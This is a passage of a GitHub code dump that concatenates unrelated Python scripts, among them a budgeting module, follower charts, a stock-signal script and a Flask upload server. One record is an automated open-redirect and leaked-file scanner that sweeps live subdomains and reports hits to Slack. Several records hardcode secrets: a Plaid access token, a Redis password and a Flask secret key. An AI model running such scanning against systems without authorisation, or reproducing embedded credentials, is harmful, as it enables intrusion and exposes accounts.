yikersList.append(int(i))\n\n\nyikersList.sort()\n\n
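# e.g. for the input line \"10 -7 4 39 -6 12 2\" the loop keeps the\n# non-negative values and the sorted output is \"2 4 10 12 39\"\n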
for i in yikersList:\n    print(i,end=' ')\n","repo_name":"AMediumRamen/CIS2348_STUFF","sub_path":"Homework 3 stuff/11.18.py","file_name":"11.18.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"17669084520","text":"#!/usr/bin/env python\n\n\nclass interpreter:\n\n    def __init__(self):\n        self.accumulator = 0\n        self.cursor = 0\n        self.instructions = list()\n        self.instruction_set = {\n            \"acc\": self.acc,\n            \"jmp\": self.jmp,\n            \"nop\": lambda a: None\n        }\n        self.used = list()\n\n    def load_instructions(self):\n        with open(\"input.txt\") as f:\n            for line in f.readlines():\n                line = line.strip()\n                instr, val = line.split(\" \")\n                val = int(val)\n                self.instructions.append((instr, val))\n\n    def run(self):\n        while 1:\n            if self.cursor in self.used:\n                print(self.accumulator)\n                break\n            self.used.append(self.cursor)\n            instr, val = self.instructions[self.cursor]\n            self.instruction_set[instr](val)\n            self.cursor += 1\n\n    def acc(self, val):\n        self.accumulator += val\n\n    def jmp(self, val):\n        self.cursor += val-1\n\n\nif __name__ == '__main__':\n    intr = interpreter()\n    intr.load_instructions()\n    intr.run()\n","repo_name":"tomatih/AdventOfCode2020","sub_path":"Day08/silver.py","file_name":"silver.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"5865525917","text":"import json\nimport re\nimport datetime\nimport sqlalchemy.exc\nfrom flask import jsonify\n\nimport plaid\nfrom pybudget.DB import Transactions, EXPENSE, INCOME, get_session\nfrom pybudget.api_helpers import valid_transaction_entry\nfrom pybudget.Budget import get_rules\nfrom pybudget import client\n\n\ndef get_transactions(month, category=None, flow=None):\n    print(month)\n    session = get_session()\n    query = session.query(Transactions).filter(Transactions.month == month)\n    if category is not None:\n        query = query.filter(Transactions.category == category)\n    if flow is not None:\n        query = query.filter(Transactions.flow == flow)\n    transactions = []\n    for row in query.all():\n        dict_item = row.__dict__\n        transaction = {'date': dict_item['date'],\n                       'name': dict_item['vendor'],\n                       'category': dict_item['category'],\n                       'amount': dict_item['amount'],\n                       'id': dict_item['id']}\n        transactions.append(transaction)\n    return transactions\n\n\ndef get_totals(month, category, flow):\n    session = get_session()\n    if flow != EXPENSE and flow != INCOME:\n        raise ValueError('Flow should be {} or {}'.format(EXPENSE, INCOME))\n    query = session.query(Transactions.category, Transactions.amount).filter(Transactions.month == month, Transactions.flow == flow)\n    if category is not None:\n        query = query.filter(Transactions.category == category)\n    query.group_by(Transactions.category)\n    totals = {}\n    for item in query.all():\n        cat = item[0]\n        if cat == '':\n            cat = 'Uncategorized'\n        if cat not in totals:\n            totals[cat] = 0\n        totals[cat] += item[1]\n    return totals\n\n\ndef get_expense_totals(month, category=None):\n    session = get_session()\n    return get_totals(month, category, EXPENSE)\n\n\ndef get_income_totals(month, category=None):\n    session = get_session()\n    return get_totals(month, category, INCOME)\n\n\ndef remove_transaction(id):\n    session = get_session()\n    transaction_query = session.query(Transactions).filter(Transactions.id == id)\n    if transaction_query.count() == 0:\n        raise KeyError('{} was not found!'.format(id))\n    transaction = transaction_query.all()[0]\n    session.delete(transaction)\n    return True\n\n\ndef refresh_transactions(month):\n    rules = get_rules()\n    session = 
get_session()\n query = session.query(Transactions).filter(Transactions.month == month)\n for row in query.all():\n dict_row = row.__dict__\n for rule in rules:\n print(\"checking {} against {}\".format(dict_row['vendor'], rule['regex']))\n if re.match(rule['regex'], str.lower(dict_row['vendor'])):\n print(\"updating {} to category {}\".format(dict_row['vendor'], rule['category']))\n row.category = rule['category']\n break\n session.commit()\n\n\ndef add_imported_transaction(date, month, vendor, amount, category, session, flow=EXPENSE):\n transaction = Transactions(date=date, month=month, imported_vendor=vendor, amount=amount, flow=flow,\n category=category)\n session.add(transaction)\n session.commit()\n\n\ndef add_api_transaction(json):\n session = get_session()\n added = 0\n invalid = 0\n for entry in json:\n if valid_transaction_entry(entry):\n if 'month' not in entry:\n entry['month'] = entry['date'][0:2] + entry['date'][8:10]\n if 'notes' not in entry:\n entry['notes'] = ''\n if 'category' not in entry:\n entry['category'] = ''\n\n transaction = Transactions(date=entry['date'],\n month=entry['month'],\n vendor=entry['vendor'],\n amount=entry['amount'],\n notes=entry['notes'],\n flow=entry['flow'],\n category=entry['category'])\n session.add(transaction)\n else:\n invalid += 1\n try:\n session.commit()\n added += 1\n except sqlalchemy.exc.OperationalError as ex:\n print(ex)\n added = -1\n except sqlalchemy.exc.IntegrityError as ex:\n # TODO: This should be optimized to so we aren't getting new sessions all of the time\n session = get_session()\n print(ex)\n return added, invalid\n\n\ndef remote_import_transactions():\n session = get_session()\n # Pull transactions for the last 30 days\n start_date = '{:%Y-%m-%d}'.format(datetime.datetime.now() + datetime.timedelta(-30))\n end_date = '{:%Y-%m-%d}'.format(datetime.datetime.now())\n rules = get_rules()\n try:\n # item_id = DgPQ0POqJrIEMLMrNxxPF4Z3jZnjPvFwyz1Kp\n access_token = \"access-development-7ae93fc0-c4f2-4f35-b2e2-952eeb011db7\"\n transactions_response = client.Transactions.get(access_token, start_date, end_date)\n with open('transactions.json', 'w') as f:\n f.write(json.dumps(transactions_response, indent=2, sort_keys=True))\n print(\"Found {} transactions\".format(transactions_response['total_transactions']))\n for transaction in transactions_response['transactions']:\n # category = check_rules(rules, transactions_response['name'])\n category = ''\n entry = Transactions(date=transaction['date'],\n month=transaction['date'][5:7] + transaction['date'][2:4],\n vendor=transaction['name'],\n amount=transaction['amount'],\n flow=EXPENSE,\n category=category,\n transaction_id=transaction['transaction_id'])\n try:\n session.add(entry)\n session.commit()\n except sqlalchemy.exc.IntegrityError:\n # Just a duplicate entry, ignore it\n session.rollback()\n pass\n except plaid.errors.PlaidError as e:\n return jsonify(format_error(e))\n\n\ndef pretty_print_response(response):\n print(json.dumps(response, indent=2, sort_keys=True))\n\n\ndef format_error(e):\n return {'error': {'display_message': e.display_message, 'error_code': e.code, 'error_type': e.type,\n 'error_message': e.message}}\n","repo_name":"sroehl/pybudget","sub_path":"pybudget/Transactions.py","file_name":"Transactions.py","file_ext":"py","file_size_in_byte":6495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"22593422658","text":"\r\nimport requests\r\nimport json\r\nimport random\r\nimport matplotlib.pyplot as 
plt\r\nimport numpy as np\r\nimport networkx as nx\r\n\r\ndef followers_pie_chart(response):\r\n    followers = r['followers']\r\n    following = r['following']\r\n    labels = 'Followers', 'Following'\r\n    sizes = [followers, following]\r\n    fig1, ax1 = plt.subplots()\r\n    ax1.pie(sizes, labels=labels, autopct='%1.1f%%',\r\n            shadow=True, startangle=90)\r\n    ax1.axis('equal')\r\n    plt.show()\r\n    return\r\n\r\ndef percentageFollowback(response):\r\n    followingURL = r['following_url']\r\n    followersURL = r['followers_url']\r\n    if followingURL.endswith('{/other_user}'):\r\n        followingURL = followingURL[:-13]\r\n    if followersURL.endswith('{/other_user}'):\r\n        followersURL = followersURL[:-13]\r\n\r\n\r\n    t = requests.get(followingURL).json()\r\n    y = 0\r\n    followingList = []\r\n    followersList = []\r\n    while y < len(t):\r\n        name = t[y]['login']\r\n        followingList.append(name + ', ')\r\n        y += 1\r\n    q = requests.get(followersURL).json()\r\n    y = 0\r\n    while y < len(q):\r\n        name = q[y]['login']\r\n        followersList.append(name + ', ')\r\n        y += 1\r\n    biggestList = 0\r\n    if len(followingList) > len(followersList):  # compare list sizes, not the lists themselves\r\n        biggestList = len(followingList)\r\n    else:\r\n        biggestList = len(followersList)\r\n    matchingFollowersSet = set(followersList) & set(followingList)\r\n    percentageFollowbacks = (len(matchingFollowersSet) / biggestList) * 100\r\n    objects = ''\r\n    y_pos = np.arange(1)\r\n    performance = [100, percentageFollowbacks]\r\n\r\n    plt.bar(y_pos, performance, align='center',label='Followbacks', alpha=0.5)\r\n    plt.xticks(y_pos, objects)\r\n    plt.ylabel('%')\r\n    plt.xlabel(str(r['login']))\r\n    plt.title('Ratio of followbacks')\r\n\r\n    plt.show()\r\n    return\r\n\r\ndef repos(response):\r\n\r\n    reposList = []\r\n    reposURL = r['repos_url']\r\n    followingURL = r['following_url']\r\n    if followingURL.endswith('{/other_user}'):\r\n        followingURL = followingURL[:-13]\r\n\r\n\r\n\r\n    t = requests.get(reposURL, auth=auth).json()\r\n    t = requests.get(followingURL, auth=auth).json()\r\n\r\n    y = 0\r\n    followingList = []\r\n    followingLista = []\r\n    while y < len(t):\r\n        name = t[y]['repos_url']\r\n        followingList.append(name + ', ')\r\n        y += 1\r\n\r\n    for x in range(0, len(followingList)):\r\n        if followingList[x].endswith(', '):\r\n            followingList[x] = followingList[x][:-2]\r\n\r\n    d=0\r\n    while d 100):\n        ax.plot(x, y, 'r.', markersize=0.5)\n    else:\n        ax.plot(x, y, 'r.', markersize=10)\n    ax.set_title(\"Plot № %d\" % i)\n    plt.savefig(\"Plot № %d.jpg\" % i, dpi=800)\n\n\nfor i in range(1, 6):\n    f = open(f\"dead_moroz/00{i}.dat\", 'r')\n    x = []\n    y = []\n    a = [i.rstrip() for i in f.readlines()]\n    a[int(a[0]) + 1::] = []\n    del a[0]\n    for j in a:\n        x.append(float(j.split()[0]))\n        y.append(float(j.split()[1]))\n    a = []\n    plotting(x, y)\n    f.close()\n","repo_name":"ArtemEvstafev/2022_Evstafev_Python","sub_path":"Lab1_MatPlotLib/Ex1/Ex1.py","file_name":"Ex1.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"74020717095","text":"'''\nProgram name : 1978.py\nAuthor : Kwon Hyuk-jin\nDate : 2020-09-18\nDescription : find prime numbers\nReference : https://www.acmicpc.net/problem/1978\n'''\n\ndef is_prime_number(num):\n    if num < 2:\n        return False\n\n    if num == 2:\n        return True\n\n    if num % 2 == 0:\n        return False\n\n    for i in range(3, num):\n        if num % i == 0:\n            return False\n\n    return True\n\n
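# Note: trial division runs all the way to num-1, which is O(n) per test;\n# checking divisors only up to int(num ** 0.5) + 1 would be sufficient.\n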
count = int(input())\nnum_list = list(map(int, input().split()))\nprime_cnt = 0\n\nfor num in num_list: \n    if is_prime_number(num):\n        prime_cnt += 1\n\nprint(prime_cnt)","repo_name":"chaltteog/AlgorithmofPython","sub_path":"code/backjoon/1978/1978.py","file_name":"1978.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"71629260458","text":"import time\nimport sys\nfrom core.subdomains import subdomainsall,addprotocol\nfrom core.multi_requests import multiget,multipost\nfrom core.networking import isalive\nfrom core.files import readfile\nfrom core.output import sendtoslack,writetofile\nfrom core.networking import iswildcard\nfrom core.timendate import current_en_time\nfrom core.wayback import waybackparamurls\nfrom core.urls import fuzzableurls\n\n# Insert the scan start time\nxtime=current_en_time()\nwritetofile('../output/open_redirect/output/open_redirect.txt', xtime)\n\nredirect_url='http://www.example.com'\ncount=0\npayloadsx=[]\nsubdomains=subdomainsall('../target-data/test.txt')\nfile_payload=readfile('../payloads/leaked_files.txt')\npayloads=[]  # was misspelled as payload, which raised a NameError below\nfuzzable_urls=fuzzableurls(waybackparamurls('miraki.com', False),redirect_url)\nfor line in file_payload:\n\tpayloads.append(line)\nfor line in fuzzable_urls:\n\tpayloadsx.append(line)\n\nfor line in payloadsx:\n\txline=line.lstrip('/')\n\tpayloads.append(xline)  # append the normalized path, not the raw line\nfor subdomain in subdomains:\n\tcount+=1\n\tif(count%1000==0):\n\t\tsendtoslack(\"[~] Status (open_redirect) :\\nTotal Domains:\"+str(len(subdomains))+\"\\n\"+\"Domains Scanned: \"+str(count))\n\tif isalive(subdomain):\n\t\twritetofile('../output/open_redirect/logs/open_redirect.log',subdomain)\n\t\tnew_subdomain=addprotocol(subdomain, 'http')\n\t\tress=multiget(new_subdomain, payloads)\n\t\tfor res in ress:\n\t\t\ttry:\n\t\t\t\tfor a in res['response'].history:\n\t\t\t\t\tif a.status_code==302 and 'example' in a.headers['location']:\n\t\t\t\t\t\tvul_url=str('\\n'+new_subdomain+res['word'])\n\t\t\t\t\t\tmsg='[~] Open Redirect: '+vul_url\n\t\t\t\t\t\tsendtoslack(msg)\n\t\t\t\t\t\twritetofile('../output/open_redirect/output/open_redirect.txt', vul_url)\n\t\t\texcept:\n\t\t\t\tpass\n\n\telse:\n\t\tprint('Skipping unreachable host',subdomain)\n\n","repo_name":"imran-parray/Automation-project","sub_path":"scanners/old/open-redirect.py","file_name":"open-redirect.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"70213358056","text":"# from open_bci_v3.py in OpenBCI's python-sdk, as is most of the openbci-specific code here.\n\nimport serial\nimport numpy as np\nimport struct\nimport time\nimport wx\nimport sys\nimport glob\n\nfrom cebl import util\nfrom cebl.rt import widgets\n\nfrom cebl.rt.sources.source import Source, SourceConfigPanel\n\n\nSAMPLE_RATE = 250.0 # Hz\nSTART_BYTE = 0xA0 # start of data packet\nEND_BYTE = 0xC0 # end of data packet\nADS1299_VREF = 4.5 #reference voltage for ADC in ADS1299. set by its hardware\nADS1299_GAIN = 24.0 #assumed gain setting for ADS1299. 
set by its Arduino code\nSCALE_uVOLTS_PER_COUNT = ADS1299_VREF/float((pow(2,23)-1))/ADS1299_GAIN*1000000.\nSCALE_ACCEL_G_PER_COUNT = 0.002 /(pow(2,4)) #assume set to +/4G, so 2 mG\n\nclass OpenBCIConfigPanel(SourceConfigPanel):\n def __init__(self, parent, src, *args, **kwargs):\n SourceConfigPanel.__init__(self, parent=parent, src=src, *args, **kwargs)\n\n self.initPollSizeSelector()\n self.initLayout()\n\n def initPollSizeSelector(self):\n pollSizeControlBox = widgets.ControlBox(self, label='Poll Size', orient=wx.HORIZONTAL)\n self.pollSizeSpinCtrl = wx.SpinCtrl(self, style=wx.SP_WRAP,\n value=str(self.src.pollSize), min=1, max=32)\n pollSizeControlBox.Add(self.pollSizeSpinCtrl, flag=wx.ALL | wx.EXPAND, border=10)\n self.Bind(wx.EVT_SPINCTRL, self.setPollSize, self.pollSizeSpinCtrl)\n\n self.sizer.Add(pollSizeControlBox, proportion=0,\n flag=wx.ALL, border=10)\n\n def setPollSize(self, event=None):\n self.src.pollSize = self.pollSizeSpinCtrl.GetValue()\n\nclass OpenBCI(Source):\n \"\"\"OpenBCI data source.\n \"\"\"\n def __init__(self, mgr, sampRate=250,\n chans=('EEG1','EEG2','EEG3','EEG4','EEG5','EEG6','EEG7','EEG8'),\n pollSize=1):\n \"\"\"Construct a new OpenBCI source.\n \"\"\"\n # initialize source parent class\n\n # chans = ('FZ', 'CZ', 'PZ', 'OZ', 'P3', 'P4', 'P7', 'P8')\n chans = ('C1','C2', 'C3', 'C4', 'C5', 'C7', 'CZ', 'PZ')\n\n\n Source.__init__(self, mgr, sampRate=sampRate, chans=chans,\n name='OpenBCI', configPanelClass=OpenBCIConfigPanel)\n\n # self.batteryScale = 4.2 - 1.28 / 16\n self.acceloScale = SCALE_ACCEL_G_PER_COUNT\n self.dataScale = SCALE_uVOLTS_PER_COUNT\n\n self.baudrate = 115200\n self.timeout = 4\n self.connected = False\n self.handshaking = False\n self.description = 'OpenBCI V3 - 8'\n self.device = None\n\n # observations collected in each poll\n self.pollSize = pollSize\n self.firstPoll = True\n\n ## Connection\n #####################################\n\n def find_port(self): # from openbci code\n # Finds the serial port names\n if sys.platform.startswith('win'):\n ports = ['COM%s' % (i+1) for i in range(256)]\n elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):\n ports = glob.glob('/dev/ttyUSB*')\n elif sys.platform.startswith('darwin'):\n ports = glob.glob('/dev/tty.usbserial*')\n else:\n raise EnvironmentError('Error finding ports on your operating system')\n print('ports',ports)\n openbci_port = ''\n for port in ports:\n try:\n s = serial.Serial(port= port, baudrate = self.baudrate, timeout=self.timeout)\n time.sleep(1)\n s.write(b's') # Chuck added. 
didn't work without this.\n time.sleep(1)\n # flush\n n = s.inWaiting()\n if n > 0:\n b = s.read(n)\n s.write(b'v')\n openbci_serial = self.openbci_id(s)\n s.close()\n print(openbci_serial)\n if openbci_serial:\n openbci_port = port;\n except (OSError, serial.SerialException):\n pass\n if openbci_port == '':\n raise OSError('Cannot find OpenBCI port')\n else:\n return openbci_port\n\n def connect(self):\n wx.LogMessage(self.getName() + ': connecting.')\n try:\n if not self.connected:\n port = '/dev/ttyUSB0' # self.find_port() # like '/dev/ttyUSB0'\n self.device = serial.Serial(port = port, baudrate = 115200, timeout = None)\n # print('device is',self.device)\n time.sleep(1)\n self.device.write(b's') # stop\n time.sleep(1)\n self.device.write(b'v') # init 32-bit board\n time.sleep(1)\n # self.description = self.getConfig()\n # print('desc is',self.description)\n\n self.device.baudrate = 115200 # has no effect in above statement\n # self.device.open()\n\n self.stopAcquisition()\n\n # self.configuration = self.getConfig()\n self.connected = True\n except Exception as e:\n self.connected = False\n raise RuntimeError('Failed to connect to OpenBCI: ' + str(e))\n\n # def read_incoming_text(self):\n # if self.device.inWaiting():\n # lines = ''\n # line = self.device.read().decode('utf-8')\n # # Look for end sequence $$$\n # while '$$$' not in line:\n # lines += line.replace('$$$','')\n # return lines\n # else:\n # return ''\n\n def disconnect(self):\n wx.LogMessage(self.getName() + ': disconnecting.')\n if self.connected is False or not self.device.isOpen():\n wx.LogMessage(self.getName() + ': already disconnected.')\n self.connected = False\n self.device = None\n return\n\n try:\n #time.sleep(1)\n self.device.close()\n\n except Exception as e:\n raise RuntimeError('Failed to disconnect from OpenBCI: ' + str(e))\n\n finally:\n self.connected = False\n self.device = None\n\n def startAcquisition(self):\n # send start command\n # self.stopAcquisition() Now done in beforeStart\n print('sending start command b')\n self.device.write(b'b')\n\n def stopAcquisition(self):\n # send stop command\n self.device.write(b's')\n time.sleep(1)\n\n try:\n n = self.device.inWaiting()\n print('stopAcquisition has',n,'bytes waiting and will read them')\n if n > 0:\n dumpBuffer = self.device.read(n)\n print( 'dumpBuffer len: ', len(dumpBuffer))\n\n except Exception as e:\n pass\n\n ## Configuration\n #####################################\n\n def getConfig(self):\n self.device.write(b'?')\n print('waiting after ? 
command')\n time.sleep(3)\n reply = ''\n n = self.device.inWaiting()\n print('there are',n,'bytes waiting')\n if n > 0:\n reply = self.device.read(n)\n\n # ack, pan_id_bs, pan_id_hs, addr_bs, addr_hs, channel_bs, channel_hs, handshaking, free_channels, huh, checksum = \\\n # struct.unpack('>bHHHHBB?H?H',reply)\n\n # return pan_id_bs, pan_id_hs, addr_bs, addr_hs, channel_bs, channel_hs, handshaking, free_channels\n print('getConfig returned')\n print(reply)\n self.description = reply\n return reply\n\n def query(self):\n try:\n self.connect()\n time.sleep(1)\n self.disconnect()\n time.sleep(1)\n\n except Exception as e:\n raise RuntimeError('Failed to query OpenBCI: ' + str(e))\n\n return repr(self)\n\n ## Data management\n #####################################\n\n def beforeStart(self):\n try:\n print('beforeStart')\n self.connect()\n print('beforeState after connect')\n self.stopAcquisition()\n # # self.startAcquisition()\n # print('inWaiting..',self.device.inWaiting())\n # if self.device.inWaiting() > 0:\n # junk = self.device.read(self.device.inWaiting())\n # time.sleep(1)\n # print('after read: inWaiting..',self.device.inWaiting())\n self.startAcquisition()\n print('returned from startAcquisition')\n\n except Exception as e:\n raise RuntimeError('Failed to start OpenBCI acquisition: ' + str(e))\n\n def afterStop(self):\n try:\n self.stopAcquisition()\n\n except:\n raise\n\n finally:\n self.disconnect()\n\n def pollData(self):\n ## Incoming Packet Structure:\n ## Start Byte(1), Sample ID(1), Channel Data(24), Acc Data(6), End Byte(1)\n ## 0xA0, 0-255, 8 3-byte signed ints, 3 2-byte signed ints, 0xC0\n ## total packet size is 1+1+24+6+1 = 33\n\n ## This code only extracts the 8 EEG channels.\n # print('pollData')\n scanSize = 33 # bytes per scan, fixed by hardware\n\n NCHANNELS = len(self.chans)\n\n eeg = np.empty((self.pollSize, NCHANNELS))\n # accelerometers = np.empty((self.pollSize, 3))\n # ids = np.empty((self.pollSize,1))\n\n eegIndices = np.array([2,5,8,11,14,17,20,23])[:NCHANNELS]\n # eegIndices = np.array([2,5]) #eegIndices([2,5]) #s:NCHANNELS)\n\n # accFirstIndex = 26\n\n # print('pollData before read of',scanSize*self.pollSize)\n reply = self.device.read(scanSize * self.pollSize)\n # print('pollData after read',len(reply))\n\n startByte,sampleId = struct.unpack('BB',reply[:2])\n\n # print('sampleId',sampleId,'startbyte',startByte,'inwaiting',self.device.inWaiting())\n\n for polli in range(self.pollSize):\n # big-endian\n\n eeg[polli,:] = [struct.unpack('>i', (b'\\x00' if reply[i] < 0x80 else b'\\xff') +\n reply[i:i+3])[0] for i in eegIndices+(polli*scanSize)]\n #eeg[polli,:] = np.array([struct.unpack('>i', (b'\\x00' if reply[i] < 0x80 else b'\\xff') + reply[i:i+3])[0] for i in eegIndices+(polli*self.pollSize)])\n\n # acci = accFirstIndex + polli * self.pollSize\n # accelerometers[polli,:] = struct.unpack('>hhh', packet[acci:acci+6])\n # ids[polli,:] = packet[1 + (polli * self.pollSize)]\n\n eeg *= SCALE_uVOLTS_PER_COUNT\n\n return eeg\n\n ## Magic\n #####################################\n\n def __repr__(self):\n r = Source.__repr__(self)\n r += '\\nHardware:\\n' + \\\n '====================\\n' + \\\n 'Description: ' + str(self.description) + '\\n' + \\\n '====================\\n'\n\n self.connected = False\n self.description = ''\n return 
r\n","repo_name":"idfah/cebl","sub_path":"cebl/rt/sources/openbci/openbci.py","file_name":"openbci.py","file_ext":"py","file_size_in_byte":10772,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"90"} +{"seq_id":"42883742954","text":"# 判断各种走势\nimport tushare as ts\nimport threading\n\nlock = threading.Lock()\n\nsumCode = 0\nsucc = 0\nsucc3 = 0\nsucc5 = 0\nsumCode2 = 0\ndefe = 0\ndefe3 = 0\ndefe5 = 0\nhighestList = {'days': [i for i in range(1, 40)], 'times': [0 for i in range(1, 40)]}\nlowestList = {'days': [i for i in range(1, 40)], 'times': [0 for i in range(1, 40)]}\nmvpList = {}\n\n\nclass Judge(object):\n\n def judgeTwiceCross(self, code, histogtam, dif, codeDict):\n\n global sumCode\n global succ\n global succ3\n global succ5\n global sumCode2\n global defe\n global defe3\n global defe5\n for i in range(1, len(histogtam['value']) - 3):\n if histogtam['value'][i] > 0 and histogtam['value'][i + 1] < 0: # 红绿\n date1 = histogtam['date'][i]\n date2 = histogtam['date'][i + 2]\n date3 = histogtam['date'][i + 3]\n dif1 = dif['value'][dif['date'].index(date1)]\n dif2 = dif['value'][dif['date'].index(date2)]\n lock.acquire()\n if 0.5 < dif2 and 0.5 < dif1 and self.judgeTopDivergence(codeDict, dif1, dif2, date1, date2):\n print('出现高位二次死叉,死叉出现的时间分别为:', date1, \",\", date2, \"。\\n预计在\", date2, \",该只股票会连续下跌\")\n sumCode2 += 1\n ratio2, lowestDays = self.scoring2(code, date2, date3)\n if ratio2 <= 1:\n defe += 1\n if ratio2 <= 0.97:\n defe3 += 1\n if ratio2 <= 0.95:\n defe5 += 1\n lowestList['times'][lowestDays] += 1\n self.addMvp(code, ratio2)\n lock.release()\n\n if histogtam['value'][i] < 0 and histogtam['value'][i + 1] > 0: # 绿红\n date1 = histogtam['date'][i]\n date2 = histogtam['date'][i + 2]\n date3 = histogtam['date'][i + 3]\n dif1 = dif['value'][dif['date'].index(date1)]\n dif2 = dif['value'][dif['date'].index(date2)]\n lock.acquire()\n if dif1 + 0.2 < dif2 < 0 and self.judgeBottomDivergence(codeDict, dif1, dif2, date1, date2): # 低位二次金叉\n print('出现低位二次金叉,金叉出现的时间分别为:', date1, \",\", date2,\n \"。\\n预���在\", date2, \",该只股票会连续上涨\")\n sumCode += 1\n ratio, highestDays = self.scoring(code, date2, date3)\n if ratio >= 1:\n succ += 1\n if ratio >= 1.03:\n succ3 += 1\n if ratio >= 1.05:\n succ5 += 1\n highestList['times'][highestDays] += 1\n lock.release()\n\n def judgeTopDivergence(self, data, dif1, dif2, date1, date2): # 判断顶背离\n if dif1 > dif2 and data['high'][data['date'].index(date1)] < data['low'][data['date'].index(date2)]:\n print(\"出现顶背离,\", end=\"\")\n return 1\n\n def judgeBottomDivergence(self, data, dif1, dif2, date1, date2): # 判断底背离\n if dif1 < dif2 and data['low'][data['date'].index(date1)] > data['high'][data['date'].index(date2)]:\n print(\"出现底背离,\", end=\"\")\n return 1\n\n def scoring(self, code, date2, date3):\n data = ts.get_hist_data(code, start=str(date2), end=str(date3))\n highestClose = 0\n highestDays = 0\n if data is not None:\n for i in range(len(data) - 1):\n if data['close'][i] > highestClose:\n highestClose = data['close'][i]\n if data['close'][i] > data['close'][i + 1]: # 按日期倒序排列\n highestDays += 1\n ratio = highestClose / data['close'][len(data['close']) - 1]\n return ratio, highestDays # 最大涨幅\n\n def scoring2(self, code, date2, date3):\n data = ts.get_hist_data(code, start=str(date2), end=str(date3))\n lowestClose = 1000\n lowestDays = 0\n if data is not None:\n for i in range(len(data['close']) - 1):\n if data['close'][i] < lowestClose:\n lowestClose = data['close'][i]\n if data['close'][i] < data['close'][i + 1]:\n 
+{"seq_id":"9009372042","text":"from flask import Flask, render_template, jsonify, redirect, request, url_for\nfrom werkzeug.utils import secure_filename\nfrom redis import Redis\nfrom rq import Queue\nfrom task import background_task\nfrom flask_cors import CORS, cross_origin\nimport logging\nimport os\n\nUPLOAD_FOLDER = 'sandbox/files'\nALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}\n\napp = Flask(__name__, static_folder='static', static_url_path='')\ncors = CORS(app)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\napp.secret_key = 'some secret key'\n\napp.config['CORS_HEADERS'] = 'Content-Type'\nlogging.basicConfig(level=logging.DEBUG)\nq = Queue(connection=Redis(host='redis', port=6379, db=0, password=\"sOmE_sEcUrE_pAsS\"))\n\n\ndef allowed_file(filename):\n    return '.' in filename and \\\n           filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n
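Editor's note: server.py sets up the RQ queue q, but the enqueue call in run_task further down is commented out. A minimal sketch of how the queue would typically be used, based on rq's public API (background_task comes from the record's own import; the argument is illustrative):

job = q.enqueue(background_task, "12")   # run background_task("12") in a worker process
print(job.id, job.get_status())          # 'queued' at first, 'finished' once a worker ran it
# the return value appears on job.result after an `rq worker` has processed the job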

\n\n@app.route('/')\ndef index():\n    return render_template('index.html')\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_file():\n    if request.method == 'POST':\n        # check if the post request has the file part\n        if 'file' not in request.files:\n            logging.info('No file part')\n            return redirect(request.url)\n        file = request.files['file']\n        # if user does not select file, browser also\n        # submit an empty part without filename\n        if file.filename == '':\n            logging.info('No selected file')\n            return redirect(request.url)\n        if file and allowed_file(file.filename):\n            filename = secure_filename(file.filename)\n            file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n            return redirect(url_for('uploaded_file',\n                                    filename=filename))\n    return '''\n    <!doctype html>\n    <title>Upload new File</title>\n    <h1>Upload new File</h1>\n    <form method=post enctype=multipart/form-data>\n      <input type=file name=file>\n      <input type=submit value=Upload>\n    </form>
\n '''\n\n\n@app.route('/run_task')\n@cross_origin()\ndef run_task():\n # job = q.enqueue(background_task, \"12\")\n #\n # return jsonify({\"data\": f\"Task ({job.id}) added to queue at {job.enqueued_at}\"})\n\n return jsonify({\"data\": f\"Task ({1}) added to queue at {1}\"})\n\n\n@app.template_filter()\ndef vue(item):\n # If you see anything about \"raw\", blame the blog engine, not me. If not,\n # ignore these comments.\n return \"{{ \" + item + \" }}\"\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=3000, debug=True)\n","repo_name":"Ivanhahanov/ECMSystem-with-IPS","sub_path":"NTSecurity/app/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"19933303170","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2016-05-20 17:00:40\n# @Author : chensijia (2350543676@qq.com)\n# @Version : 0.0.0\n# @Style : Python3.4\n#\n# @Description: operate the hash style features\n\n# pd.DataFrame(d.items()) # or list(d.items())\n\n\n## import python`s own lib\nimport os\nimport re\nimport pickle\nfrom itertools import chain\nfrom collections import OrderedDict\n\n## import third party lib\nimport pandas as pd\n\n## import local lib\n\n\n\n\nDATA_DIR = \"../season_1_sad/\" # only change this dir to change the operate dir\n\nTRAIN_FLAG = True\nCONCRETE_DIR = \"training_data\" if TRAIN_FLAG else \"test_set_1\"\n\n## all the data dir we want to solve\nCLUSTER_MAP_SHEET_DIR = \"cluster_map\"\nORDER_SHEET_DIR = \"order_data\"\nTRAFFIC_SHEET_DIR = \"traffic_data\"\nWEATHER_SHEET_DIR = \"weather_data\"\nPOI_SHEET_DIR = \"poi_data\"\n\n\n\nclass MyDistrictHashMapDict(dict):\n def __missing__(self, key):\n self[key] = max(self.values()) + 1\n return self[key]\n\nclass MyIDHashMapDict(dict):\n def __missing__(self, key):\n if not len(list(self.values())) == 0:\n self[key] = max(self.values()) + 1\n else:\n self[key] = 1 \n return self[key]\n\ndef create_hash_district_map_dict():\n print(\"creating map rule...\")\n file = \"cluster_map.csv\"\n district_hash_map_path = os.path.join(DATA_DIR, CONCRETE_DIR, 